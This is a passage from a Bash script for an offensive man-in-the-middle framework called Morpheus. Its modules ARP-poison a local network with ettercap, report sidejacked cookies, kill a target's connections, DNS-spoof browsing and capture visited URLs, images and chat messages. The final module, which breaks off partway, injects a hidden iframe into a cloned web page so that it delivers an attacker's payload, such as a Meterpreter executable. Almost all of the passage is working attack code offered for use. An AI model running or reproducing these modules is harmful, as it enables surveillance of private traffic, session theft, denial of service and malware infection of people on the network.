  fdd=`cat $IPATH/logs/sidejacking.log` > /dev/null 2>&1
  # check if variable its 'empty'
  if ! [ -z "$fdd" ]; then
  echo -e ""
  # print captured data (cookies captured list)
  echo -e "${white}Host:${YellowF} $fil_one ${white}cookies report${RedF}!"
  echo -e "$fdd"
  echo -e ""
  # warn users that we have data stored into a logfile
  Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
  fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/sidejacking.rb $IPATH/filters/sidejacking.eft > /dev/null 2>&1
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/sidejacking.ef > /dev/null 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# -------------------------------------------
# DROP/KILL TCP/UDP CONNECTION TO/FROM TARGET
# -------------------------------------------
sh_stage3 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}   This module will drop/kill any tcp/udp connections attempted   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   to/from target, droping packets from source and destination..  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} 'This module uses etter filters and tcpkill to kill connections' ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

ch=`which tcpkill`
if [ "$ch" != "$TcPkiL" ]; then
echo -e ${RedF}[x]${white} tcpkill utility not found${RedF}!${Reset};
sleep 1
echo -e ${RedF}[x]${white} please Install:${RedF}dsniff${white} packet...${Reset};
sleep 3
sh_exit
fi

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  cp $IPATH/filters/packet_drop.eft $IPATH/filters/packet_drop.rb > /dev/null 2>&1
  sleep 1

  echo -e ${BlueF}[☠]${white} Edit packet_drop.eft${RedF}!${Reset};
  sleep 1
 fil_one=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
  # replace values in template.filter with sed bash command
  cd $IPATH/filters
  sed -i "s|TaRgEt|$fil_one|g" packet_drop.eft # NO dev/null to report file not existence :D
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/packet_drop.eft"
  sleep 1

    # compiling packet_drop.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling packet_drop.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/packet_drop.eft -o $IPATH/output/packet_drop.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - TCPKILL [ctrl+c to abort]" -geometry 120x27 -e "tcpkill -i $InT3R -7 host $fil_one" & ettercap -T -Q -i $InT3R -F $IPATH/output/packet_drop.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - TCPKILL [ctrl+c to abort]" -geometry 120x27 -e "tcpkill -i $InT3R -7 host $fil_one" & ettercap -T -Q -i $InT3R -F $IPATH/output/packet_drop.ef -L $IPATH/logs/packet_drop -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - TCPKILL [ctrl+c to abort]" -geometry 120x27 -e "tcpkill -i $InT3R -7 host $fil_one" & ettercap -T -Q -i $InT3R -F $IPATH/output/packet_drop.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - TCPKILL [ctrl+c to abort]" -geometry 120x27 -e "tcpkill -i $InT3R -7 host $fil_one" & ettercap -T -Q -i $InT3R -F $IPATH/output/packet_drop.ef -L $IPATH/logs/packet_drop -M ARP /$rhost/ /$gateway/
        fi
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/packet_drop.rb $IPATH/filters/packet_drop.eft > /dev/null 2>&1
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/packet_drop.ef > /dev/null 2>&1
  cd $IPATH
  # stop background running proccess
  # sudo pkill ettercap > /dev/null 2>&1
  # sudo pkill tcpkill > /dev/null 2>&1

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# -----------------------------------------
# REDIRECT TARGET TRAFIC TO ANOTHER IP ADDR
# -----------------------------------------
sh_stage4 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}   This module will ask user to input an domain name to redirect  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}     all browser surfing in target to the selected domain.        ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}   'All [.com] domains will be redirected to the spoof addr'      ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
fil_one=$(zenity --title="☠ DOMAIN TO SPOOF ☠" --text "example: 31.192.120.44\nWARNING: next value must be decimal..." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb > /dev/null 2>&1 # backup
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/redirect.eft $IPATH/filters/redirect.rb > /dev/null 2>&1 # backup
  # use SED bash command to config our etter.dns
  sed -i "s|TaRgEt|$fil_one|g" etter.dns # NO dev/null to report file not existence :D
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  # using SED bash command to config redirect.eft
  sed -i "s|IpAdR|$fil_one|g" $IPATH/filters/redirect.eft > /dev/null 2>&1
  cd $IPATH
  sleep 1

# compiling redirect.eft to be used in ettercap
xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/redirect.eft"
echo -e ${BlueF}[☠]${white} Compiling redirect.eft${RedF}!${Reset};
sleep 1
xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/redirect.eft -o $IPATH/output/redirect.ef && sleep 3"
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/redirect -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/redirect -M ARP /$rhost/ /$gateway/
        fi
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  rm $IPATH/output/redirect.ef > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/redirect.rb $IPATH/filters/redirect.eft > /dev/null 2>&1 # backup
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# -----------------------------------------------
# REDIRECT TARGET TRAFIC TO GOOGLE SPHERE (prank)
# -----------------------------------------------
sh_stage5 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}      This module will redirect target browsing surfing under     ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}       mitm attacks to google sphere website (google prank)       ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}      'All [.com] domains will be redirected to mrdoob.com'       ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb > /dev/null 2>&1 # backup
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/redirect.eft $IPATH/filters/redirect.rb > /dev/null 2>&1 # backup
  # use SED bash command to config our etter.dns
  sed -i "s|TaRgEt|$IP|g" etter.dns # NO dev/null to report file not existence :D
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  # using SED bash command to config redirect.eft
  sed -i "s|IpAdR|http://mrdoob.com/projects/chromeexperiments/google-sphere/|g" $IPATH/filters/redirect.eft > /dev/null 2>&1
  # copy files needed to apache2 webroot...
  cp -R $IPATH/bin/phishing/"Google Sphere_files" $ApachE > /dev/null 2>&1
  cp $IPATH/bin/phishing/index.html $ApachE > /dev/null 2>&1
  cd $IPATH
  sleep 1

# compiling packet_drop.eft to be used in ettercap
xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/redirect.eft"
echo -e ${BlueF}[☠]${white} Compiling redirect.eft${RedF}!${Reset};
sleep 1
xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/redirect.eft -o $IPATH/output/redirect.ef && sleep 3"
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/sphere_prank -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/sphere_prank -M ARP /$rhost/ /$gateway/
        fi
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  rm $IPATH/output/redirect.ef > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/redirect.rb $IPATH/filters/redirect.eft > /dev/null 2>&1 # backup
  rm -R $ApachE/"Google Sphere_files" > /dev/null 2>&1
  cd $IPATH
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# -----------------------------------------------
# CAPTURE TARGET BROWSING HISTORY [URL's VISITED]
# -----------------------------------------------
sh_stage6 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}  This module will capture target browsing surfing [url visited]  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  and display then with the help of urlsnarf, this module will    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    also store urls visited into morpheus/logs/grab_hosts.log     ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


ch=`which urlsnarf`
if [ "$ch" != "$UsNar" ]; then
echo -e ${RedF}[x]${white} msgsnarf utility not found${RedF}!${Reset};
sleep 1
echo -e ${RedF}[x]${white} please Install:${RedF}dsniff${white} packet...${Reset};
sleep 3
sh_exit
fi

# get user input to build filter
rm $IPATH/logs/grab_hosts.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/filters/grab_hosts.eft $IPATH/filters/grab_hosts.rb > /dev/null 2>&1 # backup
  # use SED bash command
  sed -i "s|TaRgEt|$UpL|g" $IPATH/filters/grab_hosts.eft > /dev/null 2>&1
  cd $IPATH
  sleep 1

  # compiling UserAgent.eft to be used in ettercap
  echo -e ${BlueF}[☠]${white} Compiling grab_hosts.eft${RedF}!${Reset};
  xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/grab_hosts.eft -o $IPATH/output/grab_hosts.ef && sleep 3"
  sleep 1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, Capturing ${YellowF}HTTP${white} traffic${RedF}!${Reset};
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
      echo -e ${RedF}  # webspy -i $InT3R $UpL
        xterm -T "browsing capture [press ctrl+c to exit]" -geometry 120x27 -e "urlsnarf -i $InT3R | cut -d '\"' -f4" & ettercap -T --visual text -q -i $InT3R -F $IPATH/output/grab_hosts.ef -M ARP /$rhost// /$gateway//
      else
      echo -e ${RedF}
        xterm -T "browsing capture [press ctrl+c to exit]" -geometry 120x27 -e "urlsnarf -i $InT3R | cut -d '\"' -f4" & ettercap -T --visual text -q -i $InT3R -F $IPATH/output/grab_hosts.ef -M ARP /$rhost/ /$gateway/
      fi


  # check if exist any reports
  dd=`ls $IPATH/logs`
  cd $IPATH/logs
  tr -cd '\11\12\15\40-\176' < grab_hosts.log > clean-file.log # remove non-ancii caracters
  mv clean-file.log grab_hosts.log > /dev/null 2>&1
  if ! [ -z "$dd" ]; then
  # display captured brosing hitory to user
  HoSt=`cat $IPATH/logs/grab_hosts.log | grep "Host:"` > /dev/null 2>&1
  echo -e ""
  echo -e "${white}Host:${YellowF} $UpL ${white}browsing history${RedF}!"
  echo -e "$HoSt"
  Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
  fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/grab_hosts.rb $IPATH/filters/grab_hosts.eft > /dev/null 2>&1 # backup
  rm $IPATH/output/grab_hosts.ef > /dev/null 2>&1
  cd $IPATH
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# -------------------------------------------
# CAPTURE TARGET BROWSING PICTURES (DRIFTNET)
# -------------------------------------------
sh_stage7 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    This module will allow users to Capture images from target    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}          network traffic and display them in an X window.        ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} HINT: morpheus will store the captured images into logs/capture  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  but it will delete the contents of capture folder in the end.   ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


ch=`which driftnet`
if [ "$ch" != "$DrIn" ]; then
echo -e ${RedF}[x]${white} driftnet utility not found${RedF}!${Reset};
sleep 1
echo -e ${RedF}[x]${white} please Install:${RedF}driftnet${white} packet...${Reset};
sleep 3
sh_exit
fi

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  mkdir $IPATH/logs/capture > /dev/null 2>&1
  sleep 1
  echo -e ${BlueF}[☠]${white} Folder: logs/capture build${RedF}!${Reset};
  sleep 1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, Capturing ${YellowF}HTTP${white} traffic${RedF}!${Reset};
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
      echo -e ${RedF}  # webspy -i $InT3R $UpL
        driftnet -i $InT3R -d capture & ettercap -T --visual text -Q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
      else
      echo -e ${RedF}
        driftnet -i $InT3R -d capture & ettercap -T --visual text -Q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  rm -r $IPATH/logs/capture > /dev/null 2>&1
  cd $IPATH
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}







# -----------------------------------------------------
# CAPTURE TARGET CHAT CONVERSATIONS [IRC,AOL,YAHOO,MSN]
# -----------------------------------------------------
sh_stage8 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF} This module will capture target chat conversations in real time  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} of IRC,AOL,YAHOO,MSN,POP3 using msgsnarf as backend application  ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


ch=`which msgsnarf`
if [ "$ch" != "$MsGnA" ]; then
echo -e ${RedF}[x]${white} msgsnarf utility not found${RedF}!${Reset};
sleep 1
echo -e ${RedF}[x]${white} please Install:${RedF}dsniff${white} packet...${Reset};
sleep 3
sh_exit
fi

# get user input to build filter
rm $IPATH/logs/chat_services.log > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/filters/chat_services.eft $IPATH/filters/chat_services.rb > /dev/null 2>&1 # backup
  # use SED bash command
  sed -i "s|TaRgEt|$UpL|g" $IPATH/filters/chat_services.eft > /dev/null 2>&1
  cd $IPATH
  sleep 1

  # compiling UserAgent.eft to be used in ettercap
  echo -e ${BlueF}[☠]${white} Compiling chat_services.eft${RedF}!${Reset};
  xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/chat_services.eft -o $IPATH/output/chat_services.ef && sleep 3"
  sleep 1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Please wait, Capturing ${YellowF}HTTP${white} traffic${RedF}!${Reset};
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
      echo -e ${RedF}  # webspy -i $InT3R $UpL
        xterm -T "chat/msg capture [press ctrl+c to exit]" -geometry 120x27 -e "msgsnarf -i $InT3R $UpL" & ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/chat_services.ef -M ARP /$rhost// /$gateway//
      else
      echo -e ${RedF}
        xterm -T "chat/msg capture [press ctrl+c to exit]" -geometry 120x27 -e "msgsnarf -i $InT3R $UpL" & ettercap -T --visual text -Q -i $InT3R -F $IPATH/output/chat_services.ef -M ARP /$rhost/ /$gateway/
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/chat_services.rb $IPATH/filters/chat_services.eft > /dev/null 2>&1 # backup
  rm $IPATH/output/chat_services.ef > /dev/null 2>&1
  cd $IPATH
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# --------------------------------------------------------
# CLONE WEBSITE AND INJECT BACKDOOR ON </BODY><IFRAME> TAG
# --------------------------------------------------------
sh_stage9 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    This module will embbeded your payload into a fake webpage    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}     and delivers it using mitm+dns_spoof (trigger download)      ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}    'All [.com] domains will be redirected to the fake webpage'   ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
UpL=$(zenity --title "☠ PAYLOAD TO BE UPLOADED ☠" --filename=$IPATH --file-selection --text "chose payload to be uploded\nexample:meterpreter.exe") > /dev/null 2>&1

echo -e ${BlueF}[☠]${white} Parsing agent filename data ..${Reset};
sleep 2
echo -e "$UpL" > test.txt
dIc=`grep -oE '[^/]+$' test.txt` > /dev/null 2>&1 # payload.exe
rm test.txt > /dev/null 2>&1


  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb # backup (NO dev/null to report file not existence)
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  # using bash SED to inject our malicious <iframe>
  cd phishing
  sed "s|<\/body>|<iframe width=\"1\" height=\"1\" frameborder=\"0\" src=\"http://$IP/$dIc\"><\/iframe><\/body>|" clone.html > clone2.html
  # copy files to apache2 webroot
  mv clone2.html $ApachE/index.html > /dev/null 2>&1
  cp miss.png $ApachE > /dev/null 2>&1
  cp $UpL $ApachE > /dev/null 2>&1
  rm clone2.html > /dev/null 2>&1
  cd ..
  # use SED bash command to config our etter.dns
  sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
  cd $IPATH
  sleep 1


# IF NOT EXIST FILE IN APACHE, ABORT..
if ! [ -e $ApachE/$dIc ]; then
echo -e ${RedF}[x]${white} Backdoor:${RedF}$dIc ${white}not found...${Reset};
sleep 3
cd $ApachE
rm *.exe
rm $ApachE/miss.png > /dev/null 2>&1
cd $IPATH
sh_exit # jump to exit ...
fi

echo -e ${BlueF}[☠]${white} Found:${GreenF}$dIc${RedF}!${Reset};
sleep 1

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
